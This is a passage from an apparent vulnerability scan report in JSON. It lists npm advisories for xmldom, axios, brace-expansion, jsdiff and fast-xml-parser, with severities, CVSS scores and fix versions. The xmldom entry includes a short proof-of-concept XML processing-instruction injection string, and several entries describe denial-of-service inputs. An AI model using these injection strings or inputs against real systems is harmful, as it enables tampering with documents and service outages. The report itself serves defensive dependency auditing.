boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\nAs noted by @tlsbollei: this is the same delimiter-driven XML injection bug class previously addressed by GHSA-wh4c-j3r5-mjhp for `createCDATASection()`. Fixing CDATA while leaving PI creation and PI serialization unguarded leaves the same standards-constrained issue open for another node type.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed\nwithout being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createProcessingInstruction()` or mutate PI nodes with untrusted input\n\u003e (via `.data =` or `CharacterData` mutation methods) should audit all `serializeToString()`\n\u003e call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting any ProcessingInstruction node whose `.data` contains `?\u003e`. This check applies regardless of how `?\u003e` entered the node — whether via `createProcessingInstruction` directly or a subsequent mutation (`.data =`, `CharacterData` methods).\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the serializer additionally applies the full W3C DOM Parsing §3.2.1.7 checks when `requireWellFormed: true`:\n\n1. **Target check**: throws `InvalidStateError` if the PI target contains a `:` character or is an ASCII case-insensitive match for `\"xml\"`.\n2. **Data Char check**: throws `InvalidStateError` if the PI data contains characters outside the XML Char production.\n3. **Data sequence check**: throws `InvalidStateError` if the PI data contains `?\u003e`.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `?\u003e` data check (check 3) is applied. The target and XML Char checks are not included in the LTS fix.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n}\n```\n\nThe guard catches `?\u003e` regardless of when it was introduced:\n\n```js\n// Post-creation mutation: also caught at serialization time\nconst pi = doc.createProcessingInstruction('target', 'safe data');\ndoc.documentElement.appendChild(pi);\npi.data = 'safe?\u003e\u003cinjected/\u003e';\nnew XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n// InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing PI data verbatim. This matches browser behavior: Chrome, Firefox, and Safari all emit `?\u003e` in PI data verbatim by default without error.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing code.\n\n### Residual limitation\n\n`createProcessingInstruction(target, data)` does not validate `data` at creation time. The WHATWG DOM spec (§4.5 step 2) mandates an `InvalidCharacterError` when `data` contains `?\u003e`; enforcing this check unconditionally at creation time is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), PI data containing `?\u003e` is still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx" + ] + }, + { + "VulnerabilityID": "CVE-2026-25639", + "VendorIDs": [ + "GHSA-43fc-jf86-j433" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "cc6941597751af1b" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.13.5, 0.30.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25639", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8a9b3ffe94126ca1089add94ab65b9a3b1d160c7ba38796c89ac6eaf174043ac", + "Title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-754" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-25639", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", + "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e", + "https://github.com/axios/axios/pull/7369", + "https://github.com/axios/axios/pull/7388", + "https://github.com/axios/axios/releases/tag/v0.30.3", + "https://github.com/axios/axios/releases/tag/v1.13.5", + "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", + "https://www.cve.org/CVERecord?id=CVE-2026-25639" + ], + "PublishedDate": "2026-02-09T21:15:49.01Z", + "LastModifiedDate": "2026-02-18T18:24:34.12Z" + }, + { + "VulnerabilityID": "CVE-2025-62718", + "VendorIDs": [ + "GHSA-3p68-rc4w-qgx5" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "cc6941597751af1b" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.15.0, 0.31.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-62718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:fdf3e7211b8b024d78328d488d0363c4f2f638c04fe9e074e30c3a89f41ed614", + "Title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-441", + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N", + "V3Score": 4.8, + "V40Score": 6.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", + "V3Score": 9.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", + "V3Score": 7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-62718", + "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1", + "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", + "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df", + "https://github.com/axios/axios/pull/10661", + "https://github.com/axios/axios/pull/10688", + "https://github.com/axios/axios/releases/tag/v0.31.0", + "https://github.com/axios/axios/releases/tag/v1.15.0", + "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5", + "https://nvd.nist.gov/vuln/detail/CVE-2025-62718", + "https://www.cve.org/CVERecord?id=CVE-2025-62718" + ], + "PublishedDate": "2026-04-09T15:16:08.65Z", + "LastModifiedDate": "2026-04-16T19:16:33.063Z" + }, + { + "VulnerabilityID": "CVE-2026-40175", + "VendorIDs": [ + "GHSA-fvcv-3m26-pcqx" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "cc6941597751af1b" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.15.0, 0.31.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40175", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8b6246bb95c633a8b5c2a88cf15df3262578ac7e91e25370bde54270fed967f1", + "Title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-113", + "CWE-444", + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 4.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 4.8 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "V3Score": 9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-40175", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", + "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1", + "https://github.com/axios/axios/pull/10660", + "https://github.com/axios/axios/pull/10660#issuecomment-4224168081", + "https://github.com/axios/axios/pull/10688", + "https://github.com/axios/axios/releases/tag/v0.31.0", + "https://github.com/axios/axios/releases/tag/v1.15.0", + "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-40175", + "https://www.cve.org/CVERecord?id=CVE-2026-40175" + ], + "PublishedDate": "2026-04-10T20:16:22.8Z", + "LastModifiedDate": "2026-04-21T19:44:44.4Z" + }, + { + "VulnerabilityID": "CVE-2026-33750", + "VendorIDs": [ + "GHSA-f886-m6hf-6m8v" + ], + "PkgID": "brace-expansion@1.1.12", + "PkgName": "brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/brace-expansion@1.1.12", + "UID": "972621d048eefceb" + }, + "InstalledVersion": "1.1.12", + "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9c9472b7934f8f576906b77193dace3fe0256dbe686ede071b93fdb4ad2ee5c2", + "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", + "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33750", + "https://github.com/juliangruber/brace-expansion", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", + "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", + "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", + "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", + "https://github.com/juliangruber/brace-expansion/issues/98", + "https://github.com/juliangruber/brace-expansion/pull/95", + "https://github.com/juliangruber/brace-expansion/pull/96", + "https://github.com/juliangruber/brace-expansion/pull/97", + "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", + "https://www.cve.org/CVERecord?id=CVE-2026-33750" + ], + "PublishedDate": "2026-03-27T15:16:57.297Z", + "LastModifiedDate": "2026-04-22T14:23:19.11Z" + }, + { + "VulnerabilityID": "CVE-2026-33750", + "VendorIDs": [ + "GHSA-f886-m6hf-6m8v" + ], + "PkgID": "brace-expansion@2.0.2", + "PkgName": "brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/brace-expansion@2.0.2", + "UID": "5e453dd69b965804" + }, + "InstalledVersion": "2.0.2", + "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c0a989eb4ea3c4c02a0c85e01dd67c208353643fa59c15ee1a42ec745570a7fc", + "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", + "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33750", + "https://github.com/juliangruber/brace-expansion", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", + "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", + "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", + "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", + "https://github.com/juliangruber/brace-expansion/issues/98", + "https://github.com/juliangruber/brace-expansion/pull/95", + "https://github.com/juliangruber/brace-expansion/pull/96", + "https://github.com/juliangruber/brace-expansion/pull/97", + "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", + "https://www.cve.org/CVERecord?id=CVE-2026-33750" + ], + "PublishedDate": "2026-03-27T15:16:57.297Z", + "LastModifiedDate": "2026-04-22T14:23:19.11Z" + }, + { + "VulnerabilityID": "CVE-2026-24001", + "VendorIDs": [ + "GHSA-73rr-hh4g-fpgx" + ], + "PkgID": "diff@8.0.2", + "PkgName": "diff", + "PkgIdentifier": { + "PURL": "pkg:npm/diff@8.0.2", + "UID": "e499c88b2fc9c33d" + }, + "InstalledVersion": "8.0.2", + "FixedVersion": "8.0.3, 5.2.2, 4.0.4, 3.5.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24001", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bd8d26db7fa858b4f3718adfddcd5954c410d55257125ef4145c96dbe0d68dce", + "Title": "jsdiff: denial of service vulnerability in parsePatch and applyPatch", + "Description": "jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch whose filename headers contain the line break characters `\\r`, `\\u2028`, or `\\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its \"leading garbage\"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\\r`, `\\u2028`, or `\\u2029`.", + "Severity": "LOW", + "CweIDs": [ + "CWE-400", + "CWE-1333" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", + "V40Score": 2.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24001", + "https://github.com/kpdecker/jsdiff", + "https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5", + "https://github.com/kpdecker/jsdiff/issues/653", + "https://github.com/kpdecker/jsdiff/pull/649", + "https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24001", + "https://www.cve.org/CVERecord?id=CVE-2026-24001" + ], + "PublishedDate": "2026-01-22T03:15:47.627Z", + "LastModifiedDate": "2026-03-04T15:23:41.347Z" + }, + { + "VulnerabilityID": "CVE-2026-25896", + "VendorIDs": [ + "GHSA-m7jm-9gc2-mpf2" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.3.5, 4.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25896", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:46724e0d9d1e128a1657f1ed7e1e2f56ef571dfcea5517f52cecc369ce5652cf", + "Title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (\u0026lt;, \u0026gt;, \u0026amp;, \u0026quot;, \u0026apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-185" + ], + "VendorSeverity": { + "ghsa": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", + "V3Score": 9.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-25896", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25896", + "https://www.cve.org/CVERecord?id=CVE-2026-25896" + ], + "PublishedDate": "2026-02-20T21:19:27.47Z", + "LastModifiedDate": "2026-03-02T14:54:02.76Z" + }, + { + "VulnerabilityID": "CVE-2026-26278", + "VendorIDs": [ + "GHSA-jmr7-xgp7-cmfj" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "4.5.4, 5.3.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26278", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:fcf35535c10bb09627b13cde44f95bbf9eb44f7652f50dfda78b3f51128fb7ee", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26278", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26278", + "https://www.cve.org/CVERecord?id=CVE-2026-26278" + ], + "PublishedDate": "2026-02-19T20:25:43.717Z", + "LastModifiedDate": "2026-02-23T19:30:26.017Z" + }, + { + "VulnerabilityID": "CVE-2026-33036", + "VendorIDs": [ + "GHSA-8gc5-j5rx-235r" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.5.6, 4.5.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33036", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:73360d595f042824ee1ffe9755bc3d655041d4c5c997a9fef8d246bfec24f365", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass", + "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (\u0026#NNN;, \u0026#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like \u0026#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33036", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33036", + 